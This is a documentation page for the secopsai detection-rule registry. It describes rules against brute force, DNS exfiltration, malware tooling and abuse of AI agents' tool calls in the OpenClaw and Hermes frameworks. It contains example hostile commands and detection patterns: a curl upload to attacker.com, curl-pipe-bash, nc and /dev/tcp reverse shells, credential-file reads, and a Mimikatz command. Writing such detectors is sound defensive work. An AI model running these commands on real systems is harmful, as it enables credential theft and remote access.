Skip to content

Rules Registry

Complete reference for the core detection rules in secopsai.

Overview

The detection pipeline includes rules organized by framework:

Category Rules Focus
Baseline RULE-001 to RULE-007 General security (T1110-T1218)
OpenClaw RULE-101 to RULE-110 OpenClaw-specific attacks
Hermes Agent RULE-120 to RULE-122 Hermes agent/tool telemetry abuse
macOS RULE-201 to RULE-214 macOS host activity
Web/App RULE-301 to RULE-310 HTTP exploit patterns

Baseline Rules (RULE-001 to RULE-007)

These rules detect general attack patterns applicable to any system.

RULE-001: Brute Force (T1110)

Attack: Multiple failed authentication attempts

Pattern: 10+ failed logins in 5 minute window

Alert When:

  • Failed SSH login attempts spike
  • Rapid password guessing observed
  • Account lockout threshold approached

Example Events:

{
  "event_type": "auth_failure",
  "username": "admin",
  "source_ip": "192.168.1.100",
  "failure_count": 15,
  "window_minutes": 5
}

Severity: HIGH

Remediation: Block source IP, reset compromised account passwords

RULE-002: DNS Exfiltration (T1048.003)

Attack: Data exfiltration via DNS queries

Pattern: DNS queries with unusual patterns, long query names, binary data in labels

Alert When:

  • DNS query names contain base64/hex patterns
  • Many DNS A/AAAA requests to unique domains
  • RFC violations in DNS protocol usage

Example:

query: 6162636465666768696a6b6c6d6e6f70.attacker.com
(hex-encoded data in subdomain)

Severity: CRITICAL (data loss)

Remediation: Review DNS logs, block attacker domain, retrieve exfilt records

RULE-003: C2 Beaconing (T1071)

Attack: Command & control beacon traffic

Pattern: Periodic HTTP/HTTPS requests to known C2 infrastructure

Alert When:

  • Regular connections to IOC domains
  • Consistent intervals with error handling patterns
  • Non-standard User-Agent strings

Severity: CRITICAL (active compromise)

Remediation: Block outbound connections, isolate host, retrieve logs

RULE-004: Lateral Movement (T1021.002)

Attack: Horizontal movement via SMB/PsExec

Pattern: Remote file execution via \\server\share paths

Alert When:

  • SMB traffic to internal IPs
  • PsExec command execution observed
  • Lateral tool execution attempts

Severity: CRITICAL

Remediation: Isolate affected systems, review SMB logs

RULE-005: PowerShell Abuse (T1059.001)

Attack: Dangerous PowerShell commands

Pattern: Obfuscated PowerShell, Invoke-Webrequest chains, hidden windows

Alert When:

  • Encoded/obfuscated PowerShell scripts
  • Reflective DLL injection patterns
  • Script download & execute chains

Severity: HIGH

Remediation: Block PowerShell or constrain App-Locker policies

RULE-006: Privilege Escalation (T1068)

Attack: Attempt to gain elevated privileges

Pattern: sudo/UAC bypass, kernel exploit, privilege squashing

Alert When:

  • Failed privilege escalation attempts
  • Known CVE exploit patterns
  • Unauthorized root command execution

Severity: CRITICAL

Remediation: Apply patches, monitor PAM logs, enable UAC

RULE-007: Fileless LOLBins (T1218)

Attack: Living-off-the-land binary abuse

Pattern: Legitimate OS binaries used maliciously (certutil, mshta, regsvcs)

Alert When:

  • LOLBin command execution with suspicious arguments
  • Downloading files via certutil/mshta
  • Registry manipulation via reg.exe

Severity: HIGH

Remediation: Application whitelisting, behavior-based prevention

OpenClaw Rules (RULE-101 to RULE-110)

These rules detect attacks specific to the OpenClaw agent framework.

RULE-101: Dangerous Exec (T1059)

Attack: Dangerous command patterns in agent execution

Pattern Matches:

  • curl | bash — shell injection
  • ssh root@[host] — root access
  • scp to production — artifact theft
  • rm -rf / — destructive commands
  • Bearer tokens in plaintext — credential exposure

Alert When:

  • Exec surface contains any dangerous pattern
  • Command string matches dangerous regex

Severity: CRITICAL

Remediation:

  1. Review command authorization
  2. Check if tool was approved in agent audit log
  3. Inspect surrounding tool invocations for clues

Test:

python generate_openclaw_attack_mix.py --stats  # Generates 2 dangerous_exec events

RULE-102: Sensitive Config Change (T1528)

Attack: Unauthorized modification of critical OpenClaw settings

Pattern Matches:

  • openclaw.json authentication field mutation
  • tools.exec capability changes
  • commands.restart policy modification

Alert When:

  • Config audit surface shows mutation to protected field
  • Tool capability changed outside normal workflow

Severity: CRITICAL

Remediation:

  1. Restore from backup
  2. Audit who has config write access
  3. Enable config signing/approval workflows

Example Detection:

{
  "surface": "config",
  "action": "write",
  "changed_paths": ["openclaw.json:.auth"],
  "timestamp": "2026-03-15T14:23:45Z",
  "alert": true
}

RULE-103: Skill Source Drift (T1195)

Attack: Installing skills from untrusted sources (supply chain risk)

Pattern Matches:

  • skill_source != "clawhub" (official repository)
  • skill_source contains "github.com" with random username
  • skill_source contains "random-gist" or URL-like patterns

Alert When:

  • Skill installed from non-Clawhub origin
  • Source changed unexpectedly

Severity: HIGH (supply chain)

Remediation:

  1. Review skill source and author
  2. Audit skill code for malicious patterns
  3. Remove skill or revert to Clawhub version

Why it matters: Skills have agent execution privileges; untrusted sources = arbitrary code.

RULE-104: Policy Denial Churn (T1078)

Attack: Rapid policy denials suggesting permission brute-forcing

Pattern: 3+ denials of same denial type in under 10 minutes

Examples:

  • 3+ denied ssh attempts → blocked by policy
  • 3+ denied tool execution → insufficient capability
  • 3+ denied config edits → insufficient auth level

Alert When:

  • Denial churn window triggers
  • Multiple related denials cluster in time

Severity: MEDIUM (reconnaissance)

Remediation:

  1. Review what was being attempted
  2. Check if user account is compromised
  3. Require approval workflows for sensitive operations

RULE-105: Tool Burst Abuse (T1087)

Attack: Rapid tool invocation suggesting reconnaissance or enumeration

Pattern:

  • 5+ tool starts in under 5 minutes
  • Plus: 4+ unique tool types OR 3+ mutating operations

Requires Context (to avoid false positives):

  • severity_hint >= MEDIUM OR
  • status = "denied" OR
  • exit_code indicating failure

Examples:

  • read, write, edit, exec, gateway started in sequence → 5 tools
  • git, npm, pip all installing packages → 3 mutating

Alert When:

  • Burst shape detected
  • Plus suspicious context

Severity: MEDIUM

Remediation:

  1. Review tool chain for legitimate purpose
  2. If reconnaissance, review what was discovered
  3. Restrict rapid tool access via approval workflows

RULE-106: Pairing Churn Abuse (T1078)

Attack: Rapid pairing approval/denial cycles (authentication bypass attempts)

Pattern: start → deny → approve cycle in under 10 minutes

Why it matters: Attacker cycles approval states to test boundaries

Alert When:

  • Approval churn cycle detected

Severity: MEDIUM

Remediation:

  1. Review who is requesting pairing
  2. Check if initial requester had valid reason
  3. Increase pairing approval thresholds

RULE-107: Subagent Fanout Abuse (T1104)

Attack: Excessive subagent spawning (lateral movement/escalation)

Pattern: 3+ child subagents spawned from same requester in under 5 minutes

Why it matters: Creates execution parallelism, hard to audit

Alert When:

  • 3+ subagent spawn events from one parent in narrow window

Severity: HIGH

Remediation:

  1. Review subagent spawn justifications
  2. Limit concurrent subagent count
  3. Require approval for multi-agent workflows

RULE-108: Restart Loop (T1529)

Attack: Rapid restart cycles causing denial of service

Pattern: 2+ restarts in under 5 minutes

Requires Context (to avoid false positives):

  • Policy decision = "forced" OR "deny" OR "block" OR
  • Status = error-like (timeout, failure) OR
  • severity_hint >= MEDIUM

Why it matters: Sabotage or forced reboot loop

Alert When:

  • Restart window detected
  • Plus suspicious context

Severity: HIGH

Remediation:

  1. Investigate why restart was forced
  2. Check for resource exhaustion
  3. Limit restart frequency via policy

Test:

python generate_openclaw_attack_mix.py --stats  # Generates 2 restart_loop events

RULE-109: Data Exfiltration (T1048)

Attack: Data staging and transfer to attacker infrastructure

Pattern Matches:

  • curl -F @[file] — HTTP form upload
  • wget --post-file — HTTP post
  • rclone copy|sync to remote storage
  • rsync to remote host
  • nc bidirectional transfer
  • tar|zip && curl — archive chain
  • Keywords: "exfil", "exfiltration"

Alert When:

  • Any exfil pattern detected in exec surface

Severity: CRITICAL (data loss)

Remediation:

  1. Identify exfiltration destination
  2. Disconnect host from network
  3. Preserve logs, analyze data scope
  4. Invalidate credentials if data contains secrets

Example:

# Detected by RULE-109
curl -F "[email protected]" https://attacker.com/upload

RULE-110: Malware Presence (T1204)

Attack: Known malware tooling indicators in commands or skill sources

Pattern Matches:

  • mimikatz — credential dumping
  • cobalt strike / beacon — C2 framework
  • meterpreter / msfvenom / metasploit — exploit framework
  • xmrig — cryptocurrency miner
  • ransomware / encryptor — ransomware families
  • njrat, quasar, darkcomet, remcos — RAT families
  • Invoke-Mimikatz, sekurlsa::logonpasswords — PowerShell patterns

Alert When:

  • Malware keyword or signature detected in command text or skill_source

Severity: CRITICAL

Remediation:

  1. Immediate isolation (air-gap)
  2. Capture full memory dump
  3. Retrieve command and control logs
  4. Assess what systems were accessed

Example:

{
  "surface": "exec",
  "command": "powershell Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'",
  "matched_pattern": "Invoke-Mimikatz",
  "rule_id": "RULE-110",
  "severity": "CRITICAL"
}

Hermes Agent Rules (RULE-120 to RULE-122)

These rules detect high-confidence abuse patterns in Hermes Agent history, session, gateway, and tool-call telemetry. Routine Hermes gateway startup, provider/model errors, and normal channel activity are collected as context but do not become findings by default.

RULE-120: Hermes Dangerous Tool Call (T1059)

Attack: Risky tool or shell command execution through Hermes

Pattern Matches:

  • curl ... | bash or wget ... | sh
  • reverse-shell style nc -e or /dev/tcp chains
  • destructive root-level delete attempts
  • staged interpreter execution after chmod +x or quarantine removal

Severity: HIGH

Remediation:

  1. Review the Hermes session and channel identity.
  2. Confirm whether the tool call was operator-approved.
  3. Disable the relevant channel/toolset if the command was not expected.

RULE-121: Hermes Credential Exfiltration (T1552)

Attack: Credential discovery, staging, or outbound transfer from Hermes tool-call telemetry

Pattern Matches:

  • Reads of .env, .npmrc, .pypirc, SSH keys, cloud credentials, Docker, Kubernetes, or /proc/*/environ
  • Archive or staging commands followed by curl, wget, scp, rsync, or rclone
  • GitHub token/auth/repo download command patterns

Severity: CRITICAL

Remediation:

  1. Rotate any potentially exposed SSH, cloud, GitHub, npm, PyPI, Docker, Kubernetes, or CI/CD credentials.
  2. Review the Hermes session transcript and surrounding gateway logs.
  3. Temporarily disable the affected Hermes channel while investigating.

RULE-122: Hermes Request Dump Secret Leak (T1552)

Attack: Sensitive token material remains visible in Hermes request-dump telemetry after redaction

Pattern Matches:

  • Bearer tokens
  • GitHub token formats
  • API-key shaped values such as sk-*

Severity: HIGH

Remediation:

  1. Move or delete the affected request dump after preserving minimum metadata.
  2. Rotate the exposed token.
  3. Keep SecOpsAI redaction enabled before syncing or sharing Hermes telemetry.

How to Tune Rules

Adjust Thresholds

Edit detect.py and modify window_minutes, threshold counts, or severity levels:

def detect_openclaw_tool_burst(events: List[Dict]) -> List[str]:
    threshold = 5           # ← change required tool count
    window_minutes = 5      # ← change time window
    require_risky = True    # ← toggle context requirement

Add New Patterns

Extend regex patterns in any rule:

exfil_patterns = [
    r"(?i)curl\s+.*\s-F\s+.*@",          # existing
    r"(?i)new-object.*webclient",         # add new
]

Create New Rules

Copy a template and add to DETECTION_RULES registry:

def detect_custom_rule(events: List[Dict]) -> List[str]:
    """New rule for custom attack pattern"""
    findings = []
    for event in events:
        if suspicious_pattern(event):
            findings.append(event["event_id"])
    return findings

DETECTION_RULES = {
    "RULE-201": detect_custom_rule,  # ← register
    ...
}

Validate Changes

python generate_openclaw_attack_mix.py --stats
python evaluate_openclaw.py --labeled data/openclaw/replay/labeled/attack_mix.json --unlabeled data/openclaw/replay/unlabeled/attack_mix.json --mode benchmark

Rule Effectiveness

By Attack Type

Attack Type Covered By F1 Score
Dangerous Exec RULE-101 1.0
Sensitive Config RULE-102 1.0
Skill Drift RULE-103 1.0
Policy Denial RULE-104 1.0
Tool Burst RULE-105 1.0
Pairing Churn RULE-106 1.0
Subagent Fanout RULE-107 1.0
Restart Loop RULE-108 1.0
Data Exfil RULE-109 1.0
Malware RULE-110 1.0
Hermes Dangerous Tool Call RULE-120 covered by deterministic fixtures
Hermes Credential Exfiltration RULE-121 covered by deterministic fixtures
Hermes Request Dump Leak RULE-122 covered by deterministic fixtures

Overall

  • Combined F1: 1.000000
  • Precision: 1.000000 (no false positives)
  • Recall: 1.000000 (no missed attacks)
  • FPR: 0.000000

Next: Review Getting Started or Deploy to Production